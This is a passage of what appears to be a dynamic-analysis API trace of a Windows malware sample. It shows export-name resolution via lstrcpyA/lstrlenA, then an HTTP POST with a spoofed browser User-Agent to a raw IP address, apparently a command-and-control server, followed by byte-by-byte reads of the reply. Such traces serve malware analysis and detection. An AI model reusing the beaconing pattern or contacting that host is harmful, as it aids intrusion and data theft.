lstrcpyA (in: lpString1=0x31ce648, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0178.851] lstrlenA (lpString="DEBUGBREAK") returned 10 [0178.851] lstrcpyA (in: lpString1=0x31ce648, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0178.851] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0178.851] lstrcpyA (in: lpString1=0x31ce648, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0178.851] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0178.851] lstrcpyA (in: lpString1=0x31ce648, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0178.851] lstrlenA (lpString="DECODEPOINTER") returned 13 [0178.851] lstrcpyA (in: lpString1=0x31ce648, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0178.851] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0178.851] lstrcpyA (in: lpString1=0x31ce648, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0178.851] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0178.851] lstrcpyA (in: lpString1=0x31ce648, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0178.851] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0178.851] lstrcpyA (in: lpString1=0x31ce648, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0178.851] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0178.851] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0178.851] lstrlenA (lpString="DELETEATOM") returned 10 [0178.851] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0178.851] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0178.851] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0178.851] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0178.851] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0178.851] lstrlenA (lpString="DELETEFIBER") returned 11 [0178.851] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0178.851] lstrlenA (lpString="DELETEFILEA") returned 11 [0178.851] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0178.851] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0178.851] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0178.851] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0178.851] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0178.851] lstrlenA (lpString="DELETEFILEW") returned 11 [0178.851] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0178.851] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0178.851] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0178.851] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0178.851] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0178.851] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0178.851] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0178.851] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0178.852] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0178.852] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0178.852] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0178.852] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0178.852] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0178.852] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0178.852] lstrcpyA (in: lpString1=0x31ce648, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0178.852] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0178.852] lstrcpyA (in: lpString1=0x31ce648, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0178.852] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0178.852] lstrcpyA (in: lpString1=0x31ce648, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0178.852] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0178.852] lstrcpyA (in: lpString1=0x31ce648, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0178.852] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0178.852] lstrcpyA (in: lpString1=0x31ce648, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0178.852] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0178.852] lstrcpyA (in: lpString1=0x31ce648, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0178.852] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0178.852] lstrcpyA (in: lpString1=0x31ce648, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0178.852] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0178.852] lstrcpyA (in: lpString1=0x31ce648, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0178.852] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0178.852] lstrcpyA (in: lpString1=0x31ce648, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0178.852] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0178.852] lstrcpyA (in: lpString1=0x31ce648, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0178.852] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0178.852] lstrcpyA (in: lpString1=0x31ce648, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0178.852] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0178.852] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0178.852] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0178.852] lstrcpyA (in: lpString1=0x31ce648, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0178.852] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0178.852] lstrcpyA (in: lpString1=0x31ce648, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0178.852] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0178.852] lstrcpyA (in: lpString1=0x31ce648, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0178.852] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0178.852] lstrcpyA (in: lpString1=0x31ce648, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0178.852] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0178.853] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0178.853] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0178.853] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0178.853] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0178.853] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0178.853] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0178.853] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0178.853] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0178.853] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0178.853] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0178.853] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0178.853] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0178.853] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0178.853] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0178.853] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0178.853] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0178.853] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0178.853] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0178.853] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0178.853] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0178.853] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0178.854] wsprintfA (in: param_1=0x650000, param_2="POST /%s HTTP/1.1\r\nUser-Agent: %s\r\nHost: %s\r\nContent-Type: %s\r\nContent-Length: %d\r\nConnection: Keep-Alive\r\n\r\n" | out: param_1="POST /content/c.jsp?wk=56t2&sq=m4cr2&ud=45wlw01t HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko\r\nHost: 91.218.114.11\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 247\r\nConnection: Keep-Alive\r\n\r\n") returned 262 [0178.854] send (s=0x21c, buf=0x650000*, len=509, flags=0) returned 509 [0178.854] shutdown (s=0x21c, how=1) returned 0 [0178.854] recv (in: s=0x21c, buf=0x31cf30c, len=1, flags=0 | out: buf=0x31cf30c*) returned 1 [0178.913] recv (in: s=0x21c, buf=0x31cf30d, len=1, flags=0 | out: buf=0x31cf30d*) returned 1 [0178.913] recv (in: s=0x21c, buf=0x31cf30e, len=1, flags=0 | out: buf=0x31cf30e*) returned 1 [0178.913] recv (in: s=0x21c, buf=0x31cf30f, len=1, flags=0 | out: buf=0x31cf30f*) returned 1 [0178.913] recv (in: s=0x21c, buf=0x31cf310, len=1, flags=0 | out: buf=0x31cf310*) returned 1 [0178.913] recv (in: s=0x21c, buf=0x31cf311, len=1, flags=0 | out: buf=0x31cf311*) returned 1 [0178.913] recv (in: s=0x21c, buf=0x31cf312, len=1, flags=0 | out: buf=0x31cf312*) returned 1 [0178.913] recv (in: s=0x21c, buf=0x31cf313, len=1, flags=0 | out: buf=0x31cf313*) returned 1 [0178.913] recv (in: s=0x21c, buf=0x31cf314, len=1, flags=0 | out: buf=0x31cf314*) returned 1 [0178.913] recv (in: s=0x21c, buf=0x31cf315, len=1, flags=0 | out: buf=0x31cf315*) returned 1 [0178.913] recv (in: s=0x21c, buf=0x31cf316, len=1, flags=0 | out: buf=0x31cf316*) returned 1 [0178.913] recv (in: s=0x21c, buf=0x31cf317, len=1, flags=0 | out: buf=0x31cf317*) returned 1 [0178.913] recv (in: s=0x21c, buf=0x31cf318, len=1, flags=0 | out: buf=0x31cf318*) returned 1 [0178.913] recv (in: s=0x21c, buf=0x31cf319, len=1, flags=0 | out: buf=0x31cf319*) returned 1 [0178.914] recv (in: s=0x21c, buf=0x31cf31a, len=1, flags=0 | out: buf=0x31cf31a*) returned 1 [0178.914] recv (in: s=0x21c, buf=0x31cf31b, len=1, flags=0 | out: buf=0x31cf31b*) returned 1 [0178.914] recv (in: s=0x21c, buf=0x31cf31c, len=1, flags=0 | out: buf=0x31cf31c*) returned 1 [0178.914] recv (in: s=0x21c, buf=0x31cf31d, len=1, flags=0 | out: buf=0x31cf31d*) returned 1 [0178.914] recv (in: s=0x21c, buf=0x31cf31e, len=1, flags=0 | out: buf=0x31cf31e*) returned 1 [0178.914] recv (in: s=0x21c, buf=0x31cf31f, len=1, flags=0 | out: buf=0x31cf31f*) returned 1 [0178.914] recv (in: s=0x21c, buf=0x31cf320, len=1, flags=0 | out: buf=0x31cf320*) returned 1 [0178.914] recv (in: s=0x21c, buf=0x31cf321, len=1, flags=0 | out: buf=0x31cf321*) returned 1 [0178.914] recv (in: s=0x21c, buf=0x31cf322, len=1, flags=0 | out: buf=0x31cf322*) returned 1 [0178.914] recv (in: s=0x21c, buf=0x31cf323, len=1, flags=0 | out: buf=0x31cf323*) returned 1 [0178.914] recv (in: s=0x21c, buf=0x31cf324, len=1, flags=0 | out: buf=0x31cf324*) returned 1 [0178.914] recv (in: s=0x21c, buf=0x31cf325, len=1, flags=0 | out: buf=0x31cf325*) returned 1 [0178.914] recv (in: s=0x21c, buf=0x31cf326, len=1, flags=0 | out: buf=0x31cf326*) returned 1 [0178.914] recv (in: s=0x21c, buf=0x31cf327, len=1, flags=0 | out: buf=0x31cf327*) returned 1 [0178.914] recv (in: s=0x21c, buf=0x31cf328, len=1, flags=0 | out: buf=0x31cf328*) returned 1 [0178.915] recv (in: s=0x21c, buf=0x31cf329, len=1, flags=0 | out: buf=0x31cf329*) returned 1 [0178.915] recv (in: s=0x21c, buf=0x31cf32a, len=1, flags=0 | out: buf=0x31cf32a*) returned 1 [0178.915] recv (in: s=0x21c, buf=0x31cf32b, len=1, flags=0 | out: buf=0x31cf32b*) returned 1 [0178.915] recv (in: s=0x21c, buf=0x31cf32c, len=1, flags=0 | out: buf=0x31cf32c*) returned 1 [0178.915] recv (in: s=0x21c, buf=0x31cf32d, len=1, flags=0 | out: buf=0x31cf32d*) returned 1 [0178.915] recv (in: s=0x21c, buf=0x31cf32e, len=1, flags=0 | out: buf=0x31cf32e*) returned 1 [0178.915] recv (in: s=0x21c, buf=0x31cf32f, len=1, flags=0 | out: buf=0x31cf32f*) returned 1 [0178.915] recv (in: s=0x21c, buf=0x31cf330, len=1, flags=0 | out: buf=0x31cf330*) returned 1 [0178.915] recv (in: s=0x21c, buf=0x31cf331, len=1, flags=0 | out: buf=0x31cf331*) returned 1 [0178.915] recv (in: s=0x21c, buf=0x31cf332, len=1, flags=0 | out: buf=0x31cf332*) returned 1 [0178.915] recv (in: s=0x21c, buf=0x31cf333, len=1, flags=0 | out: buf=0x31cf333*) returned 1 [0178.915] recv (in: s=0x21c, buf=0x31cf334, len=1, flags=0 | out: buf=0x31cf334*) returned 1 [0178.915] recv (in: s=0x21c, buf=0x31cf335, len=1, flags=0 | out: buf=0x31cf335*) returned 1 [0178.915] recv (in: s=0x21c, buf=0x31cf336, len=1, flags=0 | out: buf=0x31cf336*) returned 1 [0178.916] recv (in: s=0x21c, buf=0x31cf337, len=1, flags=0 | out: buf=0x31cf337*) returned 1 [0178.916] recv (in: s=0x21c, buf=0x31cf338, len=1, flags=0 | out: buf=0x31cf338*) returned 1 [0178.916] recv (in: s=0x21c, buf=0x31cf339, len=1, flags=0 | out: buf=0x31cf339*) returned 1 [0178.916] recv (in: s=0x21c, buf=0x31cf33a, len=1, flags=0 | out: buf=0x31cf33a*) returned 1 [0178.916] recv (in: s=0x21c, buf=0x31cf33b, len=1, flags=0 | out: buf=0x31cf33b*) returned 1 [0178.916] recv (in: s=0x21c, buf=0x31cf33c, len=1, flags=0 | out: buf=0x31cf33c*) returned 1 [0178.916] recv (in: s=0x21c, buf=0x31cf33d, len=1, flags=0 | out: buf=0x31cf33d*) returned 1 [0178.916] recv (in: s=0x21c, buf=0x31cf33e, len=1, flags=0 | out: buf=0x31cf33e*) returned 1 [0178.916] recv (in: s=0x21c, buf=0x31cf33f, len=1, flags=0 | out: buf=0x31cf33f*) returned 1 [0178.916] recv (in: s=0x21c, buf=0x31cf340, len=1, flags=0 | out: buf=0x31cf340*) returned 1 [0178.916] recv (in: s=0x21c, buf=0x31cf341, len=1, flags=0 | out: buf=0x31cf341*) returned 1 [0178.916] recv (in: s=0x21c, buf=0x31cf342, len=1, flags=0 | out: buf=0x31cf342*) returned 1 [0178.916] recv (in: s=0x21c, buf=0x31cf343, len=1, flags=0 | out: buf=0x31cf343*) returned 1 [0178.916] recv (in: s=0x21c, buf=0x31cf344, len=1, flags=0 | out: buf=0x31cf344*) returned 1 [0178.916] recv (in: s=0x21c, buf=0x31cf345, len=1, flags=0 | out: buf=0x31cf345*) returned 1 [0178.917] recv (in: s=0x21c, buf=0x31cf346, len=1, flags=0 | out: buf=0x31cf346*) returned 1 [0178.917] recv (in: s=0x21c, buf=0x31cf347, len=1, flags=0 | out: buf=0x31cf347*) returned 1 [0178.917] recv (in: s=0x21c, buf=0x31cf348, len=1, flags=0 | out: buf=0x31cf348*) returned 1 [0178.917] recv (in: s=0x21c, buf=0x31cf349, len=1, flags=0 | out: buf=0x31cf349*) returned 1 [0178.917] recv (in: s=0x21c, buf=0x31cf34a, len=1, flags=0 | out: buf=0x31cf34a*) returned 1 [0178.917] recv (in: s=0x21c, buf=0x31cf34b, len=1, flags=0 | out: buf=0x31cf34b*) returned 1 [0178.917] recv (in: s=0x21c, buf=0x31cf34c, len=1, flags=0 | out: buf=0x31cf34c*) returned 1 [0178.917] recv (in: s=0x21c, buf=0x31cf34d, len=1, flags=0 | out: buf=0x31cf34d*) returned 1 [0178.917] recv (in: s=0x21c, buf=0x31cf34e, len=1, flags=0 | out: buf=0x31cf34e*) returned 1 [0178.917] recv (in: s=0x21c, buf=0x31cf34f, len=1, flags=0 | out: buf=0x31cf34f*) returned 1 [0178.917] recv (in: s=0x21c, buf=0x31cf350, len=1, flags=0 | out: buf=0x31cf350*) returned 1 [0178.917] recv (in: s=0x21c, buf=0x31cf351, len=1, flags=0 | out: buf=0x31cf351*) returned 1 [0178.917] recv (in: s=0x21c, buf=0x31cf352, len=1, flags=0 | out: buf=0x31cf352*) returned 1 [0178.917] recv (in: s=0x21c, buf=0x31cf353, len=1, flags=0 | out: buf=0x31cf353*) returned 1 [0178.917] recv (in: s=0x21c, buf=0x31cf354, len=1, flags=0 | out: buf=0x31cf354*) returned 1 [0178.918] recv (in: s=0x21c, buf=0x31cf355, len=1, flags=0 | out: buf=0x31cf355*) returned 1 [0178.918] recv (in: s=0x21c, buf=0x31cf356, len=1, flags=0 | out: buf=0x31cf356*) returned 1 [0178.918] recv (in: s=0x21c, buf=0x31cf357, len=1, flags=0 | out: buf=0x31cf357*) returned 1 [0178.918] recv (in: s=0x21c, buf=0x31cf358, len=1, flags=0 | out: buf=0x31cf358*) returned 1 [0178.918] recv (in: s=0x21c, buf=0x31cf359, len=1, flags=0 | out: buf=0x31cf359*) returned 1 [0178.918] recv (in: s=0x21c, buf=0x31cf35a, len=1, flags=0 | out: buf=0x31cf35a*) returned 1 [0178.918] recv (in: s=0x21c, buf=0x31cf35b, len=1, flags=0 | out: buf=0x31cf35b*) returned 1 [0178.918] recv (in: s=0x21c, buf=0x31cf35c, len=1, flags=0 | out: buf=0x31cf35c*) returned 1 [0178.918] recv (in: s=0x21c, buf=0x31cf35d, len=1, flags=0 | out: buf=0x31cf35d*) returned 1 [0178.918] recv (in: s=0x21c, buf=0x31cf35e, len=1, flags=0 | out: buf=0x31cf35e*) returned 1 [0178.918] recv (in: s=0x21c, buf=0x31cf35f, len=1, flags=0 | out: buf=0x31cf35f*) returned 1 [0178.918] recv (in: s=0x21c, buf=0x31cf360, len=1, flags=0 | out: buf=0x31cf360*) returned 1 [0178.918] recv (in: s=0x21c, buf=0x31cf361, len=1, flags=0 | out: buf=0x31cf361*) returned 1 [0178.918] recv (in: s=0x21c, buf=0x31cf362, len=1, flags=0 | out: buf=0x31cf362*) returned 1 [0178.918] recv (in: s=0x21c, buf=0x31cf363, len=1, flags=0 | out: buf=0x31cf363*) returned 1 [0178.919] recv (in: s=0x21c, buf=0x31cf364, len=1, flags=0 | out: buf=0x31cf364*) returned 1 [0178.919] recv (in: s=0x21c, buf=0x31cf365, len=1, flags=0 | out: buf=0x31cf365*) returned 1 [0178.919] recv (in: s=0x21c, buf=0x31cf366, len=1, flags=0 | out: buf=0x31cf366*) returned 1 [0178.919] recv (in: s=0x21c, buf=0x31cf367, len=1, flags=0 | out: buf=0x31cf367*) returned 1 [0178.919] recv (in: s=0x21c, buf=0x31cf368, len=1, flags=0 | out: buf=0x31cf368*) returned 1 [0178.919] recv (in: s=0x21c, buf=0x31cf369, len=1, flags=0 | out: buf=0x31cf369*) returned 1 [0178.919] recv (in: s=0x21c, buf=0x31cf36a, len=1, flags=0 | out: buf=0x31cf36a*) returned 1 [0178.919] recv (in: s=0x21c, buf=0x31cf36b, len=1, flags=0 | out: buf=0x31cf36b*) returned 1 [0178.919] recv (in: s=0x21c, buf=0x31cf36c, len=1, flags=0 | out: buf=0x31cf36c*) returned 1 [0178.919] recv (in: s=0x21c, buf=0x31cf36d, len=1, flags=0 | out: buf=0x31cf36d*) returned 1 [0178.919] recv (in: s=0x21c, buf=0x31cf36e, len=1, flags=0 | out: buf=0x31cf36e*) returned 1 [0178.919] recv (in: s=0x21c, buf=0x31cf36f, len=1, flags=0 | out: buf=0x31cf36f*) returned 1 [0178.919] recv (in: s=0x21c, buf=0x31cf370, len=1, flags=0 | out: buf=0x31cf370*) returned 1 [0178.919] recv (in: s=0x21c, buf=0x31cf371, len=1, flags=0 | out: buf=0x31cf371*) returned 1 [0178.920] recv (in: s=0x21c, buf=0x31cf372, len=1, flags=0 | out: buf=0x31cf372*) returned 1 [0178.920] recv (in: s=0x21c, buf=0x31cf373, len=1, flags=0 | out: buf=0x31cf373*) returned 1 [0178.920] recv (in: s=0x21c, buf=0x31cf374, len=1, flags=0 | out: buf=0x31cf374*) returned 1 [0178.920] recv (in: s=0x21c, buf=0x31cf375, len=1, flags=0 | out: buf=0x31cf375*) returned 1 [0178.920] recv (in: s=0x21c, buf=0x31cf376, len=1, flags=0 | out: buf=0x31cf376*) returned 1 [0178.920] recv (in: s=0x21c, buf=0x31cf377, len=1, flags=0 | out: buf=0x31cf377*) returned 1 [0178.920] recv (in: s=0x21c, buf=0x31cf378, len=1, flags=0 | out: buf=0x31cf378*) returned 1 [0178.920] recv (in: s=0x21c, buf=0x31cf379, len=1, flags=0 | out: buf=0x31cf379*) returned 1 [0178.920] recv (in: s=0x21c, buf=0x31cf37a, len=1, flags=0 | out: buf=0x31cf37a*) returned 1 [0178.920] recv (in: s=0x21c, buf=0x31cf37b, len=1, flags=0 | out: buf=0x31cf37b*) returned 1 [0178.920] recv (in: s=0x21c, buf=0x31cf37c, len=1, flags=0 | out: buf=0x31cf37c*) returned 1 [0178.920] recv (in: s=0x21c, buf=0x31cf37d, len=1, flags=0 | out: buf=0x31cf37d*) returned 1 [0178.920] recv (in: s=0x21c, buf=0x31cf37e, len=1, flags=0 | out: buf=0x31cf37e*) returned 1 [0178.920] recv (in: s=0x21c, buf=0x31cf37f, len=1, flags=0 | out: buf=0x31cf37f*) returned 1 [0178.920] recv (in: s=0x21c, buf=0x31cf380, len=1, flags=0 | out: buf=0x31cf380*) returned 1 [0178.921] recv (in: s=0x21c, buf=0x31cf381, len=1, flags=0 | out: buf=0x31cf381*) returned 1 [0178.921] recv (in: s=0x21c, buf=0x31cf382, len=1, flags=0 | out: buf=0x31cf382*) returned 1 [0178.921] recv (in: s=0x21c, buf=0x31cf383, len=1, flags=0 | out: buf=0x31cf383*) returned 1 [0178.921] recv (in: s=0x21c, buf=0x31cf384, len=1, flags=0 | out: buf=0x31cf384*) returned 1 [0178.921] recv (in: s=0x21c, buf=0x31cf385, len=1, flags=0 | out: buf=0x31cf385*) returned 1 [0178.921] recv (in: s=0x21c, buf=0x31cf386, len=1, flags=0 | out: buf=0x31cf386*) returned 1 [0178.921] recv (in: s=0x21c, buf=0x31cf387, len=1, flags=0 | out: buf=0x31cf387*) returned 1 [0178.921] recv (in: s=0x21c, buf=0x31cf388, len=1, flags=0 | out: buf=0x31cf388*) returned 1 [0178.921] recv (in: s=0x21c, buf=0x31cf389, len=1, flags=0 | out: buf=0x31cf389*) returned 1 [0178.921] recv (in: s=0x21c, buf=0x31cf38a, len=1, flags=0 | out: buf=0x31cf38a*) returned 1 [0178.921] recv (in: s=0x21c, buf=0x31cf38b, len=1, flags=0 | out: buf=0x31cf38b*) returned 1 [0178.921] recv (in: s=0x21c, buf=0x31cf38c, len=1, flags=0 | out: buf=0x31cf38c*) returned 1 [0178.921] recv (in: s=0x21c, buf=0x31cf38d, len=1, flags=0 | out: buf=0x31cf38d*) returned 1 [0178.921] recv (in: s=0x21c, buf=0x31cf38e, len=1, flags=0 | out: buf=0x31cf38e*) returned 1 [0178.922] recv (in: s=0x21c, buf=0x31cf38f, len=1, flags=0 | out: buf=0x31cf38f*) returned 1 [0178.922] recv (in: s=0x21c, buf=0x31cf390, len=1, flags=0 | out: buf=0x31cf390*) returned 1 [0178.922] recv (in: s=0x21c, buf=0x31cf391, len=1, flags=0 | out: buf=0x31cf391*) returned 1 [0178.922] recv (in: s=0x21c, buf=0x31cf392, len=1, flags=0 | out: buf=0x31cf392*) returned 1 [0178.922] recv (in: s=0x21c, buf=0x31cf393, len=1, flags=0 | out: buf=0x31cf393*) returned 1 [0178.922] recv (in: s=0x21c, buf=0x31cf394, len=1, flags=0 | out: buf=0x31cf394*) returned 1 [0178.922] recv (in: s=0x21c, buf=0x31cf395, len=1, flags=0 | out: buf=0x31cf395*) returned 1 [0178.922] recv (in: s=0x21c, buf=0x31cf396, len=1, flags=0 | out: buf=0x31cf396*) returned 1 [0178.922] recv (in: s=0x21c, buf=0x31cf397, len=1, flags=0 | out: buf=0x31cf397*) returned 1 [0178.922] recv (in: s=0x21c, buf=0x31cf398, len=1, flags=0 | out: buf=0x31cf398*) returned 1 [0178.922] recv (in: s=0x21c, buf=0x31cf399, len=1, flags=0 | out: buf=0x31cf399*) returned 1 [0178.922] recv (in: s=0x21c, buf=0x31cf39a, len=1, flags=0 | out: buf=0x31cf39a*) returned 1 [0178.922] recv (in: s=0x21c, buf=0x31cf39b, len=1, flags=0 | out: buf=0x31cf39b*) returned 1 [0178.922] recv (in: s=0x21c, buf=0x31cf39c, len=1, flags=0 | out: buf=0x31cf39c*) returned 1 [0178.922] recv (in: s=0x21c, buf=0x31cf39d, len=1, flags=0 | out: buf=0x31cf39d*) returned 1 [0178.923] recv (in: s=0x21c, buf=0x31cf39e, len=1, flags=0 | out: buf=0x31cf39e*) returned 1 [0178.923] recv (in: s=0x21c, buf=0x31cf39f, len=1, flags=0 | out: buf=0x31cf39f*) returned 1 [0178.923] recv (in: s=0x21c, buf=0x31cf3a0, len=1, flags=0 | out: buf=0x31cf3a0*) returned 1 [0178.923] recv (in: s=0x21c, buf=0x31cf3a1, len=1, flags=0 | out: buf=0x31cf3a1*) returned 1 [0178.923] recv (in: s=0x21c, buf=0x31cf3a2, len=1, flags=0 | out: buf=0x31cf3a2*) returned 1 [0178.923] recv (in: s=0x21c, buf=0x31cf3a3, len=1, flags=0 | out: buf=0x31cf3a3*) returned 1 [0178.923] recv (in: s=0x21c, buf=0x31cf3a4, len=1, flags=0 | out: buf=0x31cf3a4*) returned 1 [0178.923] recv (in: s=0x21c, buf=0x31cf3a5, len=1, flags=0 | out: buf=0x31cf3a5*) returned 1 [0178.923] recv (in: s=0x21c, buf=0x31cf3a6, len=1, flags=0 | out: buf=0x31cf3a6*) returned 1 [0178.923] recv 